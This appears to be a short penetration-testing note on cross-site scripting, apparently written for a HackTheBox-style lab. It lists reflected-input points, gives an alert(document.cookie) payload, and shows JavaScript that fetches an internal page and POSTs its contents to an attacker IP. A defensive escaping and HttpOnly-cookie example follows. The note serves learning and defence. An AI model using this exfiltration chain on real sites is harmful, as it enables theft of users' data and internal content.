XSS

Cross-Site Scripting (XSS) is a web attack in which the attacker injects malicious JavaScript into a page so that other users' browsers execute it for the attacker's benefit.

Reading the cookies of the current user (proof of concept that only displays them; cookies flagged HttpOnly are not visible to document.cookie)

<script>alert(document.cookie)</script>

Places to check for XSS

  • All fields in the form submission

  • User-Agent request header

  • Referer request header

XSS to CSRF

  • Create a request with XMLHttpRequest to fetch a web page

var url1 = "http://internal.dnoscp.htb";
var req1 = new XMLHttpRequest();
req1.open("GET", url1, false); // open(<request method>, <target url>, <async>): false makes the request synchronous, so responseText is available on the next line
req1.send();
var resp1 = req1.responseText;

  • With the content of the requested page stored in the variable resp1, a second request from the same JavaScript sends it to the attacker's machine

var url2 = "http://10.10.10.10";
var req2 = new XMLHttpRequest();
req2.open("POST", url2, false); // the target is the URL, not the request object
req2.send(resp1);
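
The places listed above are where untrusted input gets reflected; the following is an added defensive example (not part of the original note, and unrelated to the hosts named above) showing how the reflected payload is neutralised by contextual HTML escaping and how an HttpOnly session cookie stays out of document.cookie. The request object and the `comment` field are constructed for the example.

```javascript
// Added defensive example (not from the original note). The request object
// below is constructed; the field name "comment" is an assumption.

// Contextual output encoding for HTML text and attribute values. Every
// character that can close a tag or attribute, or start an entity, is encoded.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
  })[c]);
}

// Renders the three injection points the note lists (form field, User-Agent,
// Referer) into an HTML fragment. All untrusted values pass through escapeHtml.
function renderUntrusted(req) {
  const rows = [
    ["comment", req.body.comment],
    ["User-Agent", req.headers["user-agent"]],
    ["Referer", req.headers["referer"]],
  ];
  return rows
    .map(([k, v]) => `<tr><td>${escapeHtml(k)}</td><td>${escapeHtml(v)}</td></tr>`)
    .join("");
}

// Builds a Set-Cookie header value that page scripts cannot read: HttpOnly
// keeps it out of document.cookie, so the alert(document.cookie) payload
// would show nothing useful even if the escaping above were missing.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed request: the note's payload placed in a form field and in the
// two request headers that are often reflected into log or admin pages.
const constructedRequest = {
  body: { comment: "<script>alert(document.cookie)</script>" },
  headers: {
    "user-agent": "Mozilla/5.0 <script>alert(document.cookie)</script>",
    "referer": 'http://example.test/?q="><script>alert(1)</script>',
  },
};

// True when no raw <script> tag survives rendering: the only "<" characters
// left in the output are the ones the template itself emitted.
function renderedIsInert(req) {
  const html = renderUntrusted(req);
  return !/<script/i.test(html) && html.includes("&lt;script&gt;");
}
```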
